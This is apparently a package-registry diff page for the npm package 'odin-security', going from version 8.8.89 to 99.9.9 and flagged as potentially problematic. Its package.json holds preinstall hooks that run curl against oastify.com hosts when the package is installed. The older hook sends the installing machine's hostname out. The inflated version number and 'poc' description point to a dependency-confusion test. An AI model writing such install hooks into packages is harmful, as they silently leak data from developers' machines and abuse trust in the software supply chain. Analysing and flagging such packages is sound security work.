odin-security 8.8.89 → 99.9.9

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of odin-security might be problematic. Click here for more details.

package/index.js CHANGED
@@ -1,3 +1,3 @@
1
1
  // index.js
2
- console.log("odin package");
2
+ console.log("Hi there!");
3
3
 
package/package.json CHANGED
@@ -1,15 +1,12 @@
1
1
  {
2
2
  "name": "odin-security",
3
- "version": "8.8.89",
3
+ "version": "99.9.9",
4
4
  "description": "poc",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
- "test": "echo \"Error: no test specified\" && exit 1",
8
- "preinstall": "curl --data-urlencode info=$(hostname) http://m1o74l0p63xwf9jc60swy0h05rbrzjn8.oastify.com"
7
+ "test":"echo \"Error: no test specified\" && exit 1",
8
+ "preinstall":"curl http://r6yc9q5ub821keohb5x135m5awgq4gs5.oastify.com"
9
9
  },
10
10
  "author": "Akita",
11
- "license": "ISC",
12
- "dependencies": {
13
- "account": "^1.0.0"
14
- }
11
+ "license": "ISC"
15
12
  }
package/packages.txt DELETED
File without changes